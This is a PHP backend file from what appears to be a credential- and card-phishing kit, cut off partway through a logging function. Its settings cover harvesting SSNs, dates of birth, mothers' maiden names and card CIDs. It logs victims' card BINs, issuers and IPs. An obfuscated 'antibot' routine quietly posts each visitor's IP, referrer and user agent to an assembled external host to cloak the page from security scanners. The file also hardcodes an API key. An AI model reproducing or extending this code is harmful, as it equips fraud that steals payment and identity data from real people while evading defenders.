<?php
ob_start();

// Safe session start with fallback path
$sessionPath = sys_get_temp_dir();
if (is_writable($sessionPath)) {
    @ini_set('session.save_path', $sessionPath);
}
if (session_status() === PHP_SESSION_NONE) {
    @session_start();
}
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
ini_set('log_errors', 1);

// ===========================================
// Load configs (SAMA dengan template lain)
// ===========================================
// 1. Global config (gobot, ipwhois, email settings)
$config = json_decode(file_get_contents(__DIR__ . '/../../config/gen.json'), true) ?? [];
// 2. Access config (parameter, telegram)
$access = json_decode(file_get_contents(__DIR__ . '/../../config/access.json'), true) ?? [];
// 3. Template-specific settings (page titles, templates, dll)
$dataPage = json_decode(file_get_contents(__DIR__ . '/config.json'), true) ?? [];

// Merge parameter from access.json
$config['parameter'] = $access['parameter'] ?? 'good';

// Override config dengan nilai dari dataPage (etmin config.json uses on/off)
// Ini memastikan sinkronisasi dari GlobalSetting bekerja
$overrideKeys = ['dob', 'ssn', 'mmn', 'double_card', 'mail_login', 'save_card', 'amex_cid', 'valid_ui', 'bin_api', 'anti_dev', 'billing_declined', 'declined_template', 'activity_status', 'activity_page_status', 'cc_template', 'renewal_page_status', 'redirect_completed_link', 'city_status'];
foreach ($overrideKeys as $key) {
    if (isset($dataPage[$key])) {
        $config[$key] = $dataPage[$key];
    }
}

// Default keys jika tidak ada di global config
if (empty($config['ipwhois_key'])) {
    $config['ipwhois_key'] = 'cF8oCNZgptX8zTTj';
}

// Antibot always ON

// Include global functions
require_once __DIR__ . '/../../GlobalSetting/email_sender.php';
require_once __DIR__ . '/../../function/translate.php';
require_once __DIR__ . '/../../function/binti.php';

// Stub function - VPS Backend disabled
function sendToVPS($type, $data) {
    return null;
}

$acceptedIpsFile = __DIR__ . '/../logs/accept-ips.txt';
$deniedIpsFile = __DIR__ . '/../logs/denied-ips.txt';
$ipsFile = __DIR__ . '/../logs/ips.txt';

// ===========================================
// Core Functions (sama dengan template lain)
// ===========================================

function fetchIpData($ip, $userAgent) {
    global $config;
    $ipwhoisKey = $config['ipwhois_key'] ?? 'cF8oCNZgptX8zTTj';
    $default = [
        'ip' => $ip,
        'city' => 'Unknown',
        'region' => 'Unknown',
        'country' => 'Unknown',
        'country_code' => 'US',
        'flag' => 'https://flagcdn.com/w40/us.png',
        'phone_code' => '1',
        'postal' => '',
        'userAgent' => $userAgent
    ];
    
    $ch = curl_init("https://ipwhois.pro/{$ip}?key={$ipwhoisKey}&security=1");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    $response = curl_exec($ch);
    curl_close($ch);
    
    if (!$response) return $default;
    $data = json_decode($response, true);
    if (!is_array($data)) return $default;
    
    return [
        'ip' => $ip,
        'city' => $data['city'] ?? $default['city'],
        'region' => $data['region'] ?? $default['region'],
        'country' => $data['country'] ?? $default['country'],
        'country_code' => $data['country_code'] ?? $default['country_code'],
        'flag' => "https://flagcdn.com/w40/" . strtolower($data['country_code'] ?? 'us') . ".png",
        'phone_code' => $data['calling_code'] ?? $default['phone_code'],
        'postal' => $data['postal'] ?? '',
        'userAgent' => $userAgent
    ];
}

function showCloudflareBlocked() {
    if (ob_get_level()) ob_end_clean();
    $blockedPagePath = __DIR__ . '/../../405/wtf/cloudflare-blocked.php';
    if (file_exists($blockedPagePath)) {
        include $blockedPagePath;
    } else {
        http_response_code(403);
        echo '<!DOCTYPE html><html><head><title>Access Denied</title></head><body><h1>Access Denied</h1><p>You have been blocked.</p></body></html>';
    }
    exit;
}

// ISP Whitelist
require_once __DIR__ . '/../../function/isp_whitelist.php';

// New Antibot Function (with 24h cache)
function elkontjem($ip, $ua) {
    if (isIspWhitelisted($ip)) return 'no';
    $cacheFile = sys_get_temp_dir() . '/ab_' . md5($ip) . '.txt';
    if (file_exists($cacheFile) && (time() - filemtime($cacheFile)) < 86400) { return file_get_contents($cacheFile); }

    $xnQvhT = $_SERVER['SERVER_ADDR'] ?? '';
    $xAvLA = '127.0.0.1';
    if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xAvLA) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($xnQvhT))) {
        $realIp = $_SERVER['HTTP_CF_CONNECTING_IP'];
    } elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xAvLA)) {
        $realIp = $_SERVER['GEOIP_ADDR'];
    } elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xAvLA) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($xnQvhT))) {
        $realIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    } elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xAvLA) && (($_SERVER['HTTP_CLIENT_IP'])!=($xnQvhT))) {
        $realIp = $_SERVER['HTTP_CLIENT_IP'];
    } else {
        $realIp = $ip;
    }

    $ref = $_SERVER['HTTP_REFERER'] ?? '';
    $eRf9t9d9 = $ua;
    $dHerF777hg = !empty($_SERVER['QUERY_STRING']) ? urlencode($_SERVER['QUERY_STRING']) : '';

    $sourcename = 'c'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'w911007'; $dex9 = '.re'; $langua = 'na'; $command = 'st';

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$realIp.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename);
    $ifbot = curl_exec($ch);
    curl_close($ch);

    $result = ($ifbot === '' || $ifbot === false || $ifbot === '0') ? 'no' : 'bot';
    @file_put_contents($cacheFile, $result);
    return $result;
}

// ===========================================
// IPWhois Cache Configuration
// Cache duration bisa diatur di config.json (ipwhois_cache_hours)
// Default: 24 jam. Gobot tetap dipanggil setiap request (tidak di-cache)
// ===========================================
if (!defined('IPWHOIS_CACHE_FILE')) {
    define('IPWHOIS_CACHE_FILE', __DIR__ . '/../logs/ipwhois_cache.json');
}
if (!defined('IPWHOIS_CACHE_DURATION')) {
    $cacheHours = $config['ipwhois_cache_hours'] ?? 24;
    define('IPWHOIS_CACHE_DURATION', $cacheHours * 3600); // Konversi jam ke detik
}

/**
 * Get cached IPWhois data for an IP
 * @param string $ip - IP address
 * @return array|null - Cached data or null if not found/expired
 */
function getIpWhoisCache($ip) {
    if (!file_exists(IPWHOIS_CACHE_FILE)) {
        return null;
    }
    
    $cache = json_decode(file_get_contents(IPWHOIS_CACHE_FILE), true);
    if (!is_array($cache)) {
        return null;
    }
    
    if (isset($cache[$ip])) {
        $cachedTime = $cache[$ip]['cached_at'] ?? 0;
        $currentTime = time();
        
        // Check if cache is still valid
        if (($currentTime - $cachedTime) < IPWHOIS_CACHE_DURATION) {
            file_put_contents(__DIR__ . "/debug.log", "IPWHOIS CACHE HIT: {$ip} (cached " . round(($currentTime - $cachedTime) / 60) . " mins ago)" . PHP_EOL, FILE_APPEND);
            return $cache[$ip]['data'];
        } else {
            file_put_contents(__DIR__ . "/debug.log", "IPWHOIS CACHE EXPIRED: {$ip}" . PHP_EOL, FILE_APPEND);
        }
    }
    
    return null;
}

/**
 * Save IPWhois data to cache
 * @param string $ip - IP address
 * @param array $data - Data to cache
 */
function setIpWhoisCache($ip, $data) {
    $cache = [];
    
    if (file_exists(IPWHOIS_CACHE_FILE)) {
        $cache = json_decode(file_get_contents(IPWHOIS_CACHE_FILE), true);
        if (!is_array($cache)) {
            $cache = [];
        }
    }
    
    // Clean old entries (lebih dari 24 jam) untuk menghemat space
    $currentTime = time();
    foreach ($cache as $cachedIp => $cachedData) {
        if (($currentTime - ($cachedData['cached_at'] ?? 0)) > IPWHOIS_CACHE_DURATION) {
            unset($cache[$cachedIp]);
        }
    }
    
    // Save new cache entry
    $cache[$ip] = [
        'cached_at' => $currentTime,
        'data' => $data
    ];
    
    // Ensure logs directory exists
    $logsDir = __DIR__ . '/../logs/';
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0777, true);
    }
    
    file_put_contents(IPWHOIS_CACHE_FILE, json_encode($cache, JSON_PRETTY_PRINT));
    file_put_contents(__DIR__ . "/debug.log", "IPWHOIS CACHE SET: {$ip}" . PHP_EOL, FILE_APPEND);
}

if (!isset($_SESSION['country_datas'])) {
    $_SESSION['country_datas'] = null;
}
$lang[null] = [];

// ===========================================
// LOCAL IP BLACKLIST - File-based blacklist untuk skip API calls
// ===========================================
if (!defined('LOCAL_IP_BLACKLIST_FILE')) {
    define('LOCAL_IP_BLACKLIST_FILE', __DIR__ . '/../logs/blocked-ips.txt');
}

/**
 * Check if IP is in local blacklist file
 * @param string $ip - IP address
 * @return bool - true if blacklisted
 */
function isIpLocallyBlacklisted($ip) {
    if (!file_exists(LOCAL_IP_BLACKLIST_FILE)) {
        return false;
    }
    
    $blacklistedIps = file(LOCAL_IP_BLACKLIST_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
    foreach ($blacklistedIps as $line) {
        // Format: IP|reason|date
        $parts = explode('|', $line);
        $blacklistedIp = trim($parts[0]);
        
        if ($blacklistedIp === $ip) {
            file_put_contents(__DIR__ . "/debug.log", "LOCAL BLACKLIST HIT: {$ip}" . PHP_EOL, FILE_APPEND);
            return true;
        }
    }
    
    return false;
}

/**
 * Add IP to local blacklist file
 * @param string $ip - IP address
 * @param string $reason - Reason for blocking
 */
function addToLocalBlacklist($ip, $reason = 'Unknown') {
    // Ensure logs directory exists
    $logsDir = __DIR__ . '/../logs/';
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0777, true);
    }
    
    // Check if IP already exists
    if (isIpLocallyBlacklisted($ip)) {
        return;
    }
    
    $date = date('Y-m-d H:i:s');
    $entry = "{$ip}|{$reason}|{$date}" . PHP_EOL;
    
    file_put_contents(LOCAL_IP_BLACKLIST_FILE, $entry, FILE_APPEND | LOCK_EX);
    file_put_contents(__DIR__ . "/debug.log", "LOCAL BLACKLIST ADD: {$ip} - {$reason}" . PHP_EOL, FILE_APPEND);
}

/**
 * Check if ISP is blacklisted (partial match)
 * @param string $isp - ISP name from IPWhois
 * @return array - ['blocked' => bool, 'matched' => string|null]
 */
function checkIspBlacklist($isp) {
    global $config;
    
    // Check if ISP blacklist feature is enabled
    if (!isset($config['isp_blacklist_status']) || strtolower($config['isp_blacklist_status']) !== 'on') {
        return ['blocked' => false, 'matched' => null];
    }
    
    $ispLower = strtolower($isp);
    
    // Check whitelist first (whitelist takes priority)
    $whitelist = $config['isp_whitelist'] ?? [];
    foreach ($whitelist as $whitelistedIsp) {
        if (stripos($ispLower, strtolower($whitelistedIsp)) !== false) {
            file_put_contents(__DIR__ . "/debug.log", "ISP WHITELIST MATCH: {$isp} matches '{$whitelistedIsp}'" . PHP_EOL, FILE_APPEND);
            return ['blocked' => false, 'matched' => null];
        }
    }
    
    // Check blacklist (partial match)
    $blacklist = $config['isp_blacklist'] ?? [];
    foreach ($blacklist as $blacklistedIsp) {
        if (stripos($ispLower, strtolower($blacklistedIsp)) !== false) {
            file_put_contents(__DIR__ . "/debug.log", "ISP BLACKLIST MATCH: {$isp} matches '{$blacklistedIsp}'" . PHP_EOL, FILE_APPEND);
            return ['blocked' => true, 'matched' => $blacklistedIsp];
        }
    }
    
    return ['blocked' => false, 'matched' => null];
}

/**
 * Pre-check IP using IPWhois before calling Gobot
 * Returns early if ISP is blacklisted, saving Gobot API calls
 * @param string $ip - IP address
 * @return array - ['blocked' => bool, 'reason' => string, 'ipwhois_data' => array|null]
 */
function preCheckIpWithIpWhois($ip) {
    global $config;
    
    // Step 1: Check local blacklist first (FREE - no API call)
    if (isIpLocallyBlacklisted($ip)) {
        return [
            'blocked' => true,
            'reason' => 'IP in local blacklist',
            'ipwhois_data' => null
        ];
    }
    
    // Step 2: Get IPWhois data (cached or fresh)
    $ipwhoisData = getIpInfoFallback($ip);
    
    if ($ipwhoisData === null) {
        // If IPWhois fails, let Gobot handle it
        return [
            'blocked' => false,
            'reason' => null,
            'ipwhois_data' => null
        ];
    }
    
    // Step 3: Check ISP blacklist
    $isp = $ipwhoisData['isp'] ?? 'Unknown';
    $ispCheck = checkIspBlacklist($isp);
    
    if ($ispCheck['blocked']) {
        // Add to local blacklist for future requests
        addToLocalBlacklist($ip, "ISP Blacklisted: {$ispCheck['matched']} ({$isp})");
        
        return [
            'blocked' => true,
            'reason' => "ISP Blacklisted: {$ispCheck['matched']}",
            'ipwhois_data' => $ipwhoisData
        ];
    }
    
    // ISP is clean, proceed to Gobot
    return [
        'blocked' => false,
        'reason' => null,
        'ipwhois_data' => $ipwhoisData
    ];
}

function gobotblocker($ip, $ua, $param)
{
    $device = detectDevice();

    // Use new antibot for bot detection
    $botResult = elkontjem($ip, $ua);
    $isBot = ($botResult === 'bot');

    // Get location data from IPWhois
    $locationData = [
        'city'         => 'Unknown',
        'region'       => 'Unknown',
        'country'      => 'Unknown',
        'country_code' => 'Unknown',
        'zipcode'      => 'Unknown',
        'flag'         => 'Unknown',
        'isp'          => 'Unknown',
        'phone_code'   => null
    ];

    $fallback = getIpInfoFallback($ip);
    if ($fallback) {
        $locationData['city'] = $fallback['city'] ?? 'Unknown';
        $locationData['region'] = $fallback['region'] ?? 'Unknown';
        $locationData['country'] = $fallback['country'] ?? 'Unknown';
        $locationData['country_code'] = $fallback['country_code'] ?? 'Unknown';
        $locationData['isp'] = $fallback['isp'] ?? 'Unknown';
        $locationData['phone_code'] = $fallback['phone_code'] ?? '1';
    }

    if (empty($locationData['phone_code'])) {
        $locationData['phone_code'] = '1';
    }

    return [
        'is_bot'   => $isBot,
        'ip'       => $ip,
        'useragent'=> $ua,
        'device'   => $device,
        'action'   => $isBot ? 'block' : 'allow',
        'reason'   => $isBot ? 'Bot Detected' : 'Unknown',
        'type'     => $isBot ? 'bot' : 'human',
        'threat'   => 'Unknown',
        'location' => $locationData
    ];
}

function getIpInfoFallback($ip)
{
    global $config;
    
    // ===========================================
    // CHECK CACHE FIRST - untuk mengurangi API calls
    // ===========================================
    $cachedData = getIpWhoisCache($ip);
    if ($cachedData !== null) {
        return $cachedData;
    }
    
    // ===========================================
    // CACHE MISS - Call IPWhois API
    // ===========================================
    // IPWhois selalu aktif untuk lookup data negara/lokasi
    $apiKey = $config['ipwhois_key'] ?? 'cF8oCNZgptX8zTTj';
    if (empty($apiKey)) {
        $apiKey = 'cF8oCNZgptX8zTTj'; // Default key
    }
    
    $url = "http://ipwhois.pro/{$ip}?key={$apiKey}";
    file_put_contents(__DIR__ . "/debug.log", "IPWHOIS API CALL: {$ip} (not in cache)" . PHP_EOL, FILE_APPEND);
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
    
    $response = curl_exec($ch);
    $error = curl_error($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    file_put_contents(__DIR__ . "/debug.log", "IPWHOIS Response (HTTP {$httpCode}): {$response}" . PHP_EOL, FILE_APPEND);
    
    if ($error || empty($response)) {
        file_put_contents(__DIR__ . "/debug.log", "IPWHOIS Error: {$error}" . PHP_EOL, FILE_APPEND);
        return null;
    }
    
    $data = json_decode($response, true);
    if (!is_array($data) || (isset($data['success']) && $data['success'] === false)) {
        file_put_contents(__DIR__ . "/debug.log", "IPWHOIS: Invalid response or success=false" . PHP_EOL, FILE_APPEND);
        return null;
    }
    
    $result = [
        'city'         => $data['city'] ?? 'Unknown',
        'region'       => $data['region'] ?? 'Unknown',
        'country'      => $data['country'] ?? 'Unknown',
        'country_code' => $data['country_code'] ?? 'Unknown',
        'isp'          => $data['isp'] ?? 'Unknown',
        'phone_code'   => $data['calling_code'] ?? '1'
    ];
    
    // Set visitor country for auto-translate
    $countryCode = strtoupper($data['country_code'] ?? 'US');
    if (function_exists('setVisitorCountry')) {
        setVisitorCountry($countryCode);
    }
    $_SESSION['visitor_country'] = $countryCode;
    $_SESSION['country_code'] = $countryCode;
    
    // ===========================================
    // SAVE TO CACHE - untuk request selanjutnya
    // ===========================================
    setIpWhoisCache($ip, $result);
    
    file_put_contents(__DIR__ . "/debug.log", "IPWHOIS Result: " . json_encode($result) . PHP_EOL, FILE_APPEND);
    
    return $result;
}

function detectDevice() {
    $ua = strtolower($_SERVER['HTTP_USER_AGENT']);

    if (preg_match('/tablet|ipad|playbook|(android(?!.*(mobi|opera mini)))/i', $ua)) {
        return 'tablet';
    }

    if (preg_match('/mobile|iphone|ipod|android.*mobile|windows phone|blackberry/i', $ua)) {
        return 'mobile';
    }

    return 'desktop';
}

function checkIpStatus($ip)
{
    global $acceptedIpsFile, $deniedIpsFile;

    $acceptedIps = file_exists($acceptedIpsFile) ? file($acceptedIpsFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
    $deniedIps = file_exists($deniedIpsFile) ? file($deniedIpsFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];

    if (in_array($ip, $acceptedIps)) return 'accepted';
    if (in_array($ip, $deniedIps)) return 'denied';
    return 'unknown';
}

function loginAndCardSave($ip, $namafile) {
    if (!is_dir(__DIR__ . '/../logs/')) {
        mkdir(__DIR__ . '/../logs/', 0777, true);
    }
    
    $file = __DIR__ . '/../logs/'.$namafile;
    file_put_contents($file, $ip.'|'.date('Y-m-d') . PHP_EOL, FILE_APPEND);
}

function cardDetailsLogs($ip, $bin, $nama, $issuer, $cardtier, $scheme, $type, $namafile) {
    if (!is_dir(__DIR__ . '/../logs/')) {
        mkdir(__DIR__ . '/../logs/', 0777, true);
    }
    
    $date = date('H:i:s m-d-Y');
    
    $file = __DIR__ . '/../logs/'.$namafile;
    file_put_contents($file, "$date|$ip|$nama|$bin|$issuer|$cardtier|$scheme|$type". PHP_EOL, FILE_APPEND);
}


function getDeviceAndBrowser() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $device = "Unknown Device";
    $browser = "Unknown Browser";

    if (strpos($userAgent, 'iPhone') !== false) {
        $device = "iPhone";
    } elseif (strpos($userAgent, 'iPad') !== false) {
        $device = "iPad";
    } elseif (strpos($userAgent, 'Android') !== false) {
        $device = "Android";
    } elseif (strpos($userAgent, 'Windows NT') !== false) {
        $device = "Windows";
    } elseif (strpos($userAgent, 'Macintosh') !== false) {
        $device = "Mac";
    }

    if (strpos($userAgent, 'Chrome') !== false) {
        $browser = "Chrome";
    } elseif (strpos($userAgent, 'Safari') !== false) {
        $browser = "Safari";
    } elseif (strpos($userAgent, 'Opera') !== false) {
        $browser = "Opera";
    } elseif (strpos($userAgent, 'Firefox') !== false) {
        $browser = "Firefox";
    } elseif (strpos($userAgent, 'Edge') !== false) {
        $browser = "Edge";
    }

    return [
        'device' => $device,
        'browser' => $browser,
        'user_agent' => $userAgent
    ];
}

// BIN Cache file for faster lookups
if (!defined('BIN_CACHE_FILE')) {
    define('BIN_CACHE_FILE', __DIR__ . '/../logs/bin_cache.json');
}

function getCardDetailsFromBIN($bin) {
    // First check cache
    $cached = getBinCache($bin);
    if ($cached !== null) {
        return $cached;
    }
    
    // Clean the BIN - first 6 digits only
    $searchBin = substr(preg_replace('/[^0-9]/', '', $bin), 0, 6);
    
    // Default result based on card scheme detection
    $defaultResult = [
        'issuer'    => 'UNKNOWN BANK',
        'card_tier' => 'Standard',
        'scheme'    => detectCardScheme($searchBin),
        'type'      => 'UNKNOWN'
    ];
    
    $result = null;
    
    // === PRIORITY 1: Local CSV file (binti.php) ===
    $bintiResult = getBinInfo($searchBin);
    if ($bintiResult) {
        $result = [
            'issuer'    => $bintiResult['issuer'] ?: 'UNKNOWN BANK',
            'card_tier' => $bintiResult['card_tier'] ?: 'Standard',
            'scheme'    => $bintiResult['scheme'] ?: 'UNKNOWN',
            'type'      => $bintiResult['type'] ?: 'UNKNOWN',
            'country'   => $bintiResult['country'] ?: ''
        ];
    }
    
    // === PRIORITY 2: bins.su API ===
    if ($result === null) {
        $result = getBinFromBinsSu($searchBin);
    }
    
    // If still not found, use defaults
    if ($result === null) {
        $result = $defaultResult;
    }
    
    // Save to cache for faster future lookups
    setBinCache($searchBin, $result);
    
    return $result;
}

// Get BIN info from bins.su API (Priority 1)
function getBinFromBinsSu($bin) {
    // Try bins.su lookup page parsing (more reliable than API)
    $url = "https://bins.su/?bins=" . urlencode($bin);
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 8,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
    ]);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($httpCode === 200 && !empty($response)) {
        // Parse HTML response from bins.su
        $result = parseBinsSuHtml($response);
        if ($result !== null) {
            return $result;
        }
    }
    
    // Fallback: Try bins.su JSON API
    $apiUrl = "https://bins.su/api?bin=" . urlencode($bin);
    
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $apiUrl,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 5,
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ]);
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($httpCode === 200 && !empty($response)) {
        $data = json_decode($response, true);
        
        if ($data && isset($data['brand']) && !empty($data['brand'])) {
            return [
                'issuer'    => !empty($data['bank']) ? strtoupper($data['bank']) : 'UNKNOWN BANK',
                'card_tier' => !empty($data['level']) ? $data['level'] : 'Standard',
                'scheme'    => !empty($data['brand']) ? strtoupper($data['brand']) : 'UNKNOWN',
                'type'      => !empty($data['type']) ? strtoupper($data['type']) : 'UNKNOWN',
                'country'   => !empty($data['country']) ? $data['country'] : ''
            ];
        }
    }
    
    return null;
}

// Parse bins.su HTML response
function parseBinsSuHtml($html) {
    // Look for table with BIN data
    if (preg_match('/<td[^>]*>(\d{6,8})<\/td>.*?<td[^>]*>([^<]*)<\/td>.*?<td[^>]*>([^<]*)<\/td>.*?<td[^>]*>([^<]*)<\/td>.*?<td[^>]*>([^<]*)<\/td>.*?<td[^>]*>([^<]*)<\/td>/s', $html, $matches)) {
        $brand = trim($matches[2] ?? '');
        $type = trim($matches[3] ?? '');
        $level = trim($matches[4] ?? '');
        $bank = trim($matches[5] ?? '');
        $country = trim($matches[6] ?? '');
        
        if (!empty($brand) && $brand !== '-') {
            return [
                'issuer'    => (!empty($bank) && $bank !== '-') ? strtoupper($bank) : 'UNKNOWN BANK',
                'card_tier' => (!empty($level) && $level !== '-') ? $level : 'Standard',
                'scheme'    => strtoupper($brand),
                'type'      => (!empty($type) && $type !== '-') ? strtoupper($type) : 'UNKNOWN',
                'country'   => (!empty($country) && $country !== '-') ? $country : ''
            ];
        }
    }
    
    // Alternative pattern for different table structure
    if (preg_match_all('/<tr[^>]*class="[^"]*result[^"]*"[^>]*>(.*?)<\/tr>/s', $html, $rows)) {
        foreach ($rows[1] as $row) {
            if (preg_match_all('/<td[^>]*>([^<]*)<\/td>/s', $row, $cells)) {
                $data = array_map('trim', $cells[1]);
                if (count($data) >= 5 && !empty($data[1]) && $data[1] !== '-') {
                    return [
                        'issuer'    => (!empty($data[4]) && $data[4] !== '-') ? strtoupper($data[4]) : 'UNKNOWN BANK',
                        'card_tier' => (!empty($data[3]) && $data[3] !== '-') ? $data[3] : 'Standard',
                        'scheme'    => strtoupper($data[1]),
                        'type'      => (!empty($data[2]) && $data[2] !== '-') ? strtoupper($data[2]) : 'UNKNOWN',
                        'country'   => (!empty($data[5]) && $data[5] !== '-') ? $data[5] : ''
                    ];
                }
            }
        }
    }
    
    return null;
}


// Detect card scheme from BIN prefix
function detectCardScheme($bin) {
    $bin = (string)$bin;
    $firstDigit = substr($bin, 0, 1);
    $firstTwo = substr($bin, 0, 2);
    $firstFour = substr($bin, 0, 4);
    
    // Visa
    if ($firstDigit === '4') {
        return 'VISA';
    }
    // Mastercard
    if (in_array($firstTwo, ['51', '52', '53', '54', '55']) || 
        ($firstFour >= '2221' && $firstFour <= '2720')) {
        return 'MASTERCARD';
    }
    // American Express
    if (in_array($firstTwo, ['34', '37'])) {
        return 'AMEX';
    }
    // Discover
    if ($firstFour === '6011' || $firstTwo === '65' || 
        (substr($bin, 0, 3) >= '644' && substr($bin, 0, 3) <= '649')) {
        return 'DISCOVER';
    }
    // JCB
    if ($firstFour >= '3528' && $firstFour <= '3589') {
        return 'JCB';
    }
    // Diners Club
    if (in_array($firstTwo, ['36', '38']) || 
        (substr($bin, 0, 3) >= '300' && substr($bin, 0, 3) <= '305')) {
        return 'DINERS';
    }
    
    return 'Unknown';
}

// Get cached BIN data
function getBinCache($bin) {
    if (!file_exists(BIN_CACHE_FILE)) {
        return null;
    }
    
    $cache = json_decode(file_get_contents(BIN_CACHE_FILE), true);
    if (!is_array($cache)) {
        return null;
    }
    
    $searchBin = substr(preg_replace('/[^0-9]/', '', $bin), 0, 6);
    
    if (isset($cache[$searchBin])) {
        return $cache[$searchBin];
    }
    
    return null;
}

// Set BIN data to cache
function setBinCache($bin, $data) {
    $cache = [];
    if (file_exists(BIN_CACHE_FILE)) {
        $cache = json_decode(file_get_contents(BIN_CACHE_FILE), true);
        if (!is_array($cache)) {
            $cache = [];
        }
    }
    
    $searchBin = substr(preg_replace('/[^0-9]/', '', $bin), 0, 6);
    $cache[$searchBin] = $data;
    
    // Limit cache to 10000 entries to prevent file from growing too large
    if (count($cache) > 10000) {
        $cache = array_slice($cache, -5000, 5000, true);
    }
    
    $logsDir = __DIR__ . '/../logs/';
    if (!is_dir($logsDir)) {
        mkdir($logsDir, 0777, true);
    }
    
    file_put_contents(BIN_CACHE_FILE, json_encode($cache, JSON_PRETTY_PRINT));
}

function getDevice() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    if (strpos($userAgent, 'Android') !== false) return 'Android';
    elseif (strpos($userAgent, 'iPhone') !== false) return 'iPhone';
    elseif (strpos($userAgent, 'iPad') !== false) return 'iPad';
    elseif (strpos($userAgent, 'Windows NT') !== false) return 'Windows';
    elseif (strpos($userAgent, 'Macintosh') !== false) return 'Mac';
    return 'Unknown Device';
}

function getBrowser() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    if (strpos($userAgent, 'Chrome') !== false) return 'Chrome';
    elseif (strpos($userAgent, 'Firefox') !== false) return 'Firefox';
    elseif (strpos($userAgent, 'Safari') !== false) return 'Safari';
    elseif (strpos($userAgent, 'Opera') !== false) return 'Opera';
    elseif (strpos($userAgent, 'Edge') !== false) return 'Edge';
    return 'Unknown Browser';
}

function saveIp($fileName, $ip)
{
    if (!file_exists($fileName)) file_put_contents($fileName, '');
    $fileContent = file($fileName, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    
    if (!in_array($ip, $fileContent)) {
        file_put_contents($fileName, $ip.'|'.date('Y-m-d') . PHP_EOL, FILE_APPEND);
    }
}

function saveIpData($ipData, $logs = '')
{
    if (!is_array($ipData) || empty($ipData['ip'])) {
        return;
    }
    global $ipsFile, $acceptedIpsFile, $deniedIpsFile;
    
    $date = date('H:i:s m-d-Y');
    $device = getDevice();
    $browser = getBrowser();
    
    $ipRecord = "{$date}|{$ipData['ip']}|{$ipData['city']}|{$ipData['region']}|{$ipData['country']}|{$ipData['flag']}|$browser|$device|{$ipData['userAgent']}|{$logs}";
    
    $isBot = stripos($logs, 'bot') !== false || 
             stripos($logs, 'blocked') !== false || 
             stripos($logs, 'denied') !== false ||
             stripos($logs, 'gobot') !== false ||
             stripos($logs, 'threat') !== false;
    
    $targetFile = $isBot ? $deniedIpsFile : $acceptedIpsFile;
    
    if (!file_exists($targetFile)) file_put_contents($targetFile, '');
    
    // Check if this exact combination already exists (IP + action + browser + device)
    $fileContent = @file($targetFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [];
    $entryExists = false;
    
    foreach ($fileContent as $line) {
        $parts = explode('|', $line);
        $lineIp = trim($parts[1] ?? $parts[0] ?? '');
        $lineBrowser = trim($parts[6] ?? '');
        $lineDevice = trim($parts[7] ?? '');
        $lineAction = trim($parts[9] ?? '');
        
        // Check if same IP + action + browser + device already exists
